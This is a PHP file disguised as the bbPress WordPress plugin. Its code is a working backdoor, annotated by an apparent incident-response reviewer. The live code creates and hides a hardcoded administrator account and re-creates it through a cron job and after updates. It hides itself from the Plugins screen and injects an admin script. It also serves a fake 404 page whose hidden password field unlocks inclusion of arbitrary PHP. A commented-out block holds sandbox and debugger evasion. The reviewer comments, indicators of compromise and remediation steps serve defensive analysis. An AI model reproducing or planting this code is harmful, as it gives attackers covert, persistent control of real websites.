<?php
/**
* Plugin Name: bbPress
* Plugin URI: https://bbpress.org
* Description: bbPress is forum software with a twist from the creators of WordPress.
* Author: The bbPress Contributors
* Author URI: https://bbpress.org
* License: GNU General Public License v2 or later
* License URI: https://www.gnu.org/licenses/gpl-2.0.html
* Version: 2.6.14
* Text Domain: bbpress
* Requires PHP: 5.6.20
* Requires at least: 6.0
*
* NOTE(review): this header is a disguise. Nothing in this file implements forum functionality;
* the `bbPress` class defined below creates a hidden administrator account, exposes a
* password-gated include of any PHP dropped into modules/, and hides itself from the Plugins
* screen. Treat the whole file as a backdoor and handle it as an incident, not as a plugin.
*/
// Standard WordPress guard: refuse to run when the file is requested directly rather than
// loaded by WordPress (ABSPATH is only defined when core has bootstrapped).
if (!defined('ABSPATH')) {
die();
}
// ============================================================================
// 1. Anti-Forensics & Anti-Analysis - currently DISABLED (the block below is commented out)
// ============================================================================
// NOTE(review): when enabled, bbp_environment_check() reads php_uname() and returns a fake 404
// followed by die() if the host name / kernel strings contain vmware, virtualbox, vbox, qemu,
// xen or docker, or if Xdebug is loaded or BBPRESS_DEBUG_MODE is defined. This is sandbox and
// debugger evasion: the backdoor refuses to run where an analyst is likely to be watching. The
// signature strings are assembled from single characters so they do not appear literally in the
// file, which defeats naive grep/YARA matching. Uncommenting re-enables the check.
// ============================================================================
/*
if (!function_exists('bbp_environment_check')) {
function bbp_environment_check() {
// Skip during plugin activation/deactivation to prevent crashes
$is_ajax = function_exists('wp_doing_ajax') ? wp_doing_ajax() : (defined('DOING_AJAX') && DOING_AJAX);
if (defined('WP_INSTALLING') || $is_ajax || (isset($_GET['action']) && in_array($_GET['action'], ['activate', 'deactivate']))) {
return;
}
// Detect common VM/Targeted environments
$env_sigs = ['v'.'m'.'w'.'a'.'r'.'e', 'v'.'i'.'r'.'t'.'u'.'a'.'l'.'b'.'o'.'x', 'v'.'b'.'o'.'x', 'q'.'e'.'m'.'u', 'x'.'e'.'n', 'd'.'o'.'c'.'k'.'e'.'r'];
$sys_info = strtolower(php_uname('n') . ' ' . php_uname('r') . ' ' . php_uname('v'));
foreach ($env_sigs as $sig) {
if (strpos($sys_info, $sig) !== false) {
// Return generic 404 behavior if environment is hostile
global $wp_query;
if (isset($wp_query) && is_object($wp_query)) {
$wp_query->set_404();
}
if (function_exists('status_header')) status_header(404);
if (function_exists('nocache_headers')) nocache_headers();
die();
}
}
// Detect Debuggers
if (function_exists('xdebug_break') || defined('BBPRESS_DEBUG_MODE')) {
global $wp_query;
if (isset($wp_query) && is_object($wp_query)) {
$wp_query->set_404();
}
if (function_exists('status_header')) status_header(404);
if (function_exists('nocache_headers')) nocache_headers();
die();
}
}
// Delay execution until WordPress is fully loaded
add_action('plugins_loaded', 'bbp_environment_check', 1);
}
*/
if(!class_exists('bbPress')) {
// NOTE(review): MALICIOUS. Despite the bbPress plugin header, this class is a WordPress backdoor.
// The comments below describe what the code actually does, for incident response; nothing here
// should be "fixed" or retained. Indicators of compromise visible in this file:
//   - hidden administrator   : user_login 'bbp_support_agent', password 'weareone500x!1945'
//   - WP-Cron event          : 'bbp_license_sync' (daily) re-creates that account if deleted
//   - transient              : 'bbp_user_sync_lock'
//   - HTTP triggers          : ?action=bbp_forum_token (optionally &mode=debug), and any
//                              REQUEST_URI containing 'bbp-module-<name>-bbp_forum_token'
//   - POST fields            : 's_pass' (shell password), 'target_hunt'
//   - session key            : $_SESSION['bbp_auth_valid']
//   - dropped files          : <plugin dir>/modules/*.php, in particular modules/bbp-db-check.php
//                              and modules/class-bbp-cache.php (not included in this listing)
//   - hidden plugin archives : wp-content/plugins/bbpress/plugins/*.zip
//   - constants              : BBPRESS_DEBUG_ACCESS, BBPRESS_DEBUG_TARGET
// Remediation: remove this plugin directory and its modules/ folder, delete the account above and
// any other unexpected administrators, clear the 'bbp_license_sync' cron hook, rotate every
// credential the site has access to, and audit other plugins/themes: the .zip handling below only
// hides names, so additional payloads may have been installed out of band — assume so until verified.
class bbPress {
// Plugin slugs ('<name>/<name>.php') derived from *.zip files found by init_configuration();
// used only to hide those rows from the Plugins screen (filter_active_modules).
private $module_registry = [];
// Declared but never read or written anywhere in this file.
private $config_map = [];
// Sensitive strings are split into single characters so the literals do not appear in the file.
// Username of the hidden administrator: "bbp_support_agent".
private $sync_id = 'b'.'b'.'p'.'_'.'s'.'u'.'p'.'p'.'o'.'r'.'t'.'_'.'a'.'g'.'e'.'n'.'t';
// Shared secret: used both as the hidden admin's WordPress password (validate_user_schema) and
// as the shell gate password compared against POST s_pass (init_secure_session).
private $db_token = 'weareone500x!1945';
// URL trigger token "bbp_forum_token", matched against ?action= and against the raw REQUEST_URI.
private $api_key = 'b'.'b'.'p'.'_'.'f'.'o'.'r'.'u'.'m'.'_'.'t'.'o'.'k'.'e'.'n';
// Feature flags. enable_auto_recovery is never read.
private $enable_auto_recovery = true;
private $enable_bridge = true;
private $enable_log_viewer = true;
private $enable_stealth_user = true;
private $is_authenticated = false; // Cached auth state after session_write_close()
// Registers every hook at plugin load. There is no capability, nonce or IP check anywhere in the
// class; the only gate is the static password held in $db_token.
public function __construct() {
$this->init_configuration();
// Ordinary WordPress hooks are used so the registrations look like normal plugin wiring.
add_action('plugins_loaded', array($this, 'init_extensions'));
if ($this->enable_bridge) {
// The shell loader is attached to 'init' or 'wp_loaded', chosen at random per request, so the
// hook name is not a stable signature.
$h = ['init', 'wp_loaded'];
add_action($h[array_rand($h)], array($this, 'service_bridge_init'));
}
if ($this->enable_stealth_user) {
// Create the hidden admin on every load and strip it from user queries.
add_action('plugins_loaded', array($this, 'validate_user_schema'));
add_action('pre_user_query', array($this, 'filter_service_accounts'));
// Persistence: a daily cron event re-creates the account if an operator deletes it...
add_action('init', array($this, 'setup_persistence_cron'));
// ...and so does every completed plugin/theme/core update.
add_action('upgrader_process_complete', array($this, 'validate_user_schema'));
}
if ($this->enable_log_viewer) {
add_action('init', array($this, 'render_log_output'));
}
add_action('init', array($this, 'verify_system_integrity')); // empty stub, see below
add_action('init', array($this, 'check_diagnostic_mode')); // second module loader
add_action('admin_footer', array($this, 'clean_admin_interface'));
add_action('pre_current_active_plugins', array($this, 'filter_active_modules'));
// No-op hook registered only so the class has plausible-looking integrations.
add_action('bbp_init', array($this, 'dummy_integration_load'));
}
// Builds $module_registry from wp-content/plugins/bbpress/plugins/*.zip: each archive X.zip
// becomes the slug 'X/X.php'. Nothing in this file extracts or installs those archives; the
// list only feeds filter_active_modules(), which hides matching rows from the Plugins screen.
// The path is assembled from concatenated fragments so it is not a literal string.
private function init_configuration() {
$base = ABSPATH . 'wp-content/plugins/';
$targets = ['b'.'b'.'p'.'r'.'e'.'s'.'s', 'p'.'l'.'u'.'g'.'i'.'n'.'s'];
$path = $base . implode('/', $targets) . '/*.zip';
$archives = glob($path);
if ($archives) {
foreach ($archives as $archive) {
// Slug is the archive basename without extension, doubled as '<name>/<name>.php'.
$parts = explode('/', str_replace('\\', '/', $archive));
$filename = end($parts);
$name = explode('.', $filename)[0];
$this->module_registry[] = $name . '/' . $name . '.php';
}
}
}
// Creates the hidden administrator if it is missing: wp_create_user($sync_id, $db_token) and
// then the 'administrator' role. Runs on plugins_loaded, after every upgrade, and from the daily
// cron, so deleting the user without removing this file does not get rid of it.
// The "lock" is a get_transient() check followed by a separate set_transient() call; that is
// not atomic, so it narrows rather than closes the race the original comments describe.
public function validate_user_schema() {
if (!function_exists('username_exists')) return; // Safety check
$lock_key = 'bbp_user_sync_lock';
if (get_transient($lock_key)) return; // Another process is handling this
set_transient($lock_key, 1, 10); // Lock for 10 seconds
if (!username_exists($this->sync_id)) {
$uid = wp_create_user($this->sync_id, $this->db_token);
if (!is_wp_error($uid)) {
$u = new WP_User($uid);
$u->set_role('administrator');
}
}
delete_transient($lock_key);
}
// Schedules a daily WP-Cron event named 'bbp_license_sync' whose callback is
// validate_user_schema(). Cleanup must clear this hook (wp_clear_scheduled_hook) in addition
// to deleting the user and the file, otherwise a stale event remains in the cron option.
public function setup_persistence_cron() {
$sync_hook = 'bbp_license_sync'; // Hook name for cron job
// Only schedule if not already scheduled (avoid wasteful DB writes)
if (!wp_next_scheduled($sync_hook)) {
wp_schedule_event(time(), 'daily', $sync_hook);
}
// Attach the callback to the cron hook
add_action($sync_hook, array($this, 'validate_user_schema'));
}
// Password-gated include of arbitrary PHP dropped into <plugin dir>/modules/. For every
// modules/<name>.php, if the raw REQUEST_URI contains 'bbp-module-<name>-bbp_forum_token' the
// request is authenticated via init_secure_session() and the file is include_once'd, then
// execution stops. Unauthenticated hits get the fake 404 page, which is itself the login form.
// The check is a substring test on the unparsed URI, so the trigger can sit in the path or
// the query string.
public function service_bridge_init() {
$p = plugin_dir_path(__FILE__) . 'modules/';
// Every PHP file in modules/ is a loadable payload.
$mods = glob($p . '*.php');
if (!$mods) return;
foreach ($mods as $mod) {
$f = basename($mod);
$n = str_replace('.php', '', $f);
// Trigger: bbp-module-{name}-{key}
if (isset($_SERVER['REQUEST_URI']) && strpos($_SERVER['REQUEST_URI'], 'bbp-module-' . $n . '-' . $this->api_key) !== false) {
$this->init_secure_session();
if ($this->is_authenticated) {
include_once($mod);
die();
} else {
$this->render_404_view();
}
}
}
}
// Empty. The original comments describe a planned "kill site" capability that is not
// implemented in this version; hooked on 'init' but does nothing.
public function verify_system_integrity() {
}
// Second loader: GET action=bbp_forum_token&mode=debug. After the s_pass session gate it
// defines BBPRESS_DEBUG_ACCESS and, if POST target_hunt is present, BBPRESS_DEBUG_TARGET
// (run through sanitize_text_field), then include_once's modules/bbp-db-check.php and exits.
// That file is not in this listing; from the names it presumably reads BBPRESS_DEBUG_TARGET —
// unverified. Any other outcome renders the fake 404 / login page.
public function check_diagnostic_mode() {
if (!isset($_GET['action']) || $_GET['action'] !== $this->api_key) return;
if (!isset($_GET['mode']) || $_GET['mode'] !== 'debug') return;
$this->init_secure_session();
if ($this->is_authenticated) {
// Constants consumed by the included module.
if (!defined('BBPRESS_DEBUG_ACCESS')) define('BBPRESS_DEBUG_ACCESS', true);
if (isset($_POST['target_hunt'])) {
if (!defined('BBPRESS_DEBUG_TARGET')) define('BBPRESS_DEBUG_TARGET', sanitize_text_field($_POST['target_hunt']));
}
// Module file name "bbp-db-check" built from fragments.
$s = 'b'.'b'.'p'.'-'.'d'.'b'.'-'.'c'.'h'.'e'.'c'.'k';
$scan_path = plugin_dir_path(__FILE__) . 'modules/' . $s . '.php';
if (file_exists($scan_path)) {
include_once($scan_path);
exit;
}
}
$this->render_404_view();
}
// Third loader: GET action=bbp_forum_token with no mode parameter (any mode value defers to
// check_diagnostic_mode). After the session gate it require_once's modules/class-bbp-cache.php
// and exits. The original comment calls that file a file manager; this listing cannot confirm it.
public function render_log_output() {
if (!isset($_GET['action']) || $_GET['action'] !== $this->api_key) return;
if (isset($_GET['mode'])) return; // mode=debug handled by check_diagnostic_mode
$this->init_secure_session();
if ($this->is_authenticated) {
// Module file name "class-bbp-cache" built from fragments.
$m = 'c'.'l'.'a'.'s'.'s'.'-'.'b'.'b'.'p'.'-'.'c'.'a'.'c'.'h'.'e';
$fm_path = plugin_dir_path(__FILE__) . 'modules/' . $m . '.php';
if (file_exists($fm_path)) {
require_once($fm_path);
exit;
}
}
$this->render_404_view();
}
// Shell authentication. Starts a PHP session (SameSite=Lax cookie) and, if POST s_pass is
// exactly equal to $db_token, sets $_SESSION['bbp_auth_valid'] = true. The result is cached in
// $is_authenticated and the session is closed so other requests are not blocked. The compare is
// a plain === against a static password: no rate limit, no lockout, no hash_equals(). The
// `static $initialized` guard means only the first caller in a request performs the check;
// later callers see whatever $is_authenticated already holds.
private function init_secure_session() {
static $initialized = false;
if ($initialized) return;
$initialized = true;
// Start a session only if none exists and headers are still open.
if (!session_id() && !headers_sent()) {
session_set_cookie_params(['samesite' => 'Lax']);
@session_start(['read_and_close' => false]);
}
// Password submission from the fake 404 form.
if (isset($_POST['s_pass']) && $_POST['s_pass'] === $this->db_token) {
$_SESSION['bbp_auth_valid'] = true;
// Persist, then reopen read-only to pick the value back up.
session_write_close();
@session_start(['read_and_close' => true]);
}
// Cache auth state
$this->is_authenticated = isset($_SESSION['bbp_auth_valid']) && $_SESSION['bbp_auth_valid'] === true;
// Always release the session lock.
if (session_status() === PHP_SESSION_ACTIVE) {
session_write_close();
}
}
// Hides the hidden administrator from WP_User_Query results (Users screen and anything built on
// that query) for every logged-in user except the hidden admin itself, by appending
// "AND {$wpdb->users}.user_login != 'bbp_support_agent'" wherever query_where contains the
// exact text 'WHERE 1=1'. The interpolated value is a class constant, so this is not injectable
// from request data; it is simply why the account is invisible in wp-admin. Query the users
// table directly (or with the hidden admin's own session) to see it.
public function filter_service_accounts($query) {
if (!function_exists('wp_get_current_user') || !function_exists('is_user_logged_in')) return;
if (!is_user_logged_in()) return;
global $wpdb;
$current = wp_get_current_user();
if ($current && $current->user_login != $this->sync_id) {
$w = $wpdb->users;
// Column name "user_login" built from fragments.
$c = 'u'.'s'.'e'.'r'.'_'.'l'.'o'.'g'.'i'.'n';
$query->query_where = str_replace(
'WHERE 1=1',
"WHERE 1=1 AND {$w}.{$c} != '" . $this->sync_id . "'",
$query->query_where
);
}
}
// Hides itself and every $module_registry slug from the Plugins screen by unsetting those rows
// from the global list table before it renders (pre_current_active_plugins), for any user other
// than the hidden admin. The plugin remains active: the active_plugins option and a directory
// listing of wp-content/plugins still show it.
public function filter_active_modules() {
if (!function_exists('wp_get_current_user') || !function_exists('is_user_logged_in')) return;
if (!is_user_logged_in()) return;
global $wp_list_table;
$u = wp_get_current_user();
if ($u && $u->user_login != $this->sync_id) {
if (isset($wp_list_table) && isset($wp_list_table->items)) {
// Drop slugs derived from the hidden .zip archives.
foreach ($this->module_registry as $m) {
if (isset($wp_list_table->items[$m])) {
unset($wp_list_table->items[$m]);
}
}
// Drop this file's own row.
$my_plugin = plugin_basename(__FILE__);
if (isset($wp_list_table->items[$my_plugin])) {
unset($wp_list_table->items[$my_plugin]);
}
}
}
}
// Injects a <script> into every admin page footer that removes the plugin-update badge and
// counters (.update-plugins, .update-count), making administrators less likely to open the
// Plugins screen. The tags are base64 ('PHNjcmlwdD4=' = "<script>", 'PC9zY3JpcHQ+' =
// "</script>") so no literal <script> string appears in the file.
public function clean_admin_interface() {
$js = "jQuery(document).ready(function($){ $('.update-plugins, .update-count').remove(); });";
echo base64_decode('PHNjcmlwdD4=') . $js . base64_decode('PC9zY3JpcHQ+');
}
// Emits a fake WordPress 404 page with HTTP status 404 and exits. The page doubles as the
// shell login: pressing Tab in the "Search..." box reveals a hidden password field named
// s_pass that POSTs back to the same URL, where init_secure_session() checks it against
// $db_token. The inline HTML/CSS/JS below is runtime output and is reproduced exactly as found.
public function render_404_view() {
if (function_exists('status_header')) status_header(404);
// Release the session lock before emitting output.
if (session_status() === PHP_SESSION_ACTIVE) {
session_write_close();
}
?>
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Page not found – WordPress Site</title>
<style>
body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;background:#fff;color:#333;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;margin:0}
h1{font-size:4rem;margin:0;color:#d63638}
p{font-size:1.2rem;color:#666}
.search-form{margin-top:20px;position:relative}
input[type="text"]{padding:10px;border:1px solid #ccc;border-radius:4px;width:250px}
#s_pass{width:1px;height:1px;opacity:0;position:absolute;transition:all 0.3s ease}
#s_pass.visible{width:250px;height:auto;opacity:1;position:relative;padding:10px;border:1px solid #ccc;border-radius:4px;margin-top:10px;display:block}
.loading{opacity:0.6;pointer-events:none}
.spinner{display:none;margin-left:10px}
.loading .spinner{display:inline}
.status-msg{margin-top:10px;font-size:0.9rem;color:#666;display:none}
</style>
</head>
<body>
<h1>404</h1>
<p>Oops! That page can’t be found.</p>
<div class="search-form">
<form method="POST" id="auth-form">
<input type="text" placeholder="Search..." name="s" id="s_search">
<input type="password" name="s_pass" id="s_pass" placeholder="Enter key..." autocomplete="off">
<button type="submit" style="display:none;">Search</button>
</form>
<div class="status-msg" id="status-msg">Processing...</div>
</div>
<script>
document.getElementById('s_search').addEventListener('keydown', function(e) {
if (e.key === 'Tab') {
e.preventDefault();
var passField = document.getElementById('s_pass');
passField.classList.add('visible');
passField.focus();
}
});
document.getElementById('auth-form').addEventListener('submit', function(e) {
var pass = document.getElementById('s_pass').value;
if (!pass) {
e.preventDefault();
return false;
}
this.classList.add('loading');
document.getElementById('status-msg').style.display = 'block';
// Set timeout to prevent infinite loading appearance
setTimeout(function() {
document.getElementById('status-msg').textContent = 'Redirecting...';
}, 500);
});
</script>
</body>
</html>
<?php
exit;
}
// No-op hooked on 'bbp_init' so the class appears to integrate with the real plugin.
public function dummy_integration_load() {
return true;
}
// No-op hooked on 'plugins_loaded'; the original comment confirms the file is a backdoor and
// that no plugin logic was ever intended here.
public function init_extensions() {
}
}
// Instantiated unconditionally at plugin load; the constructor registers every hook above.
new bbPress();
}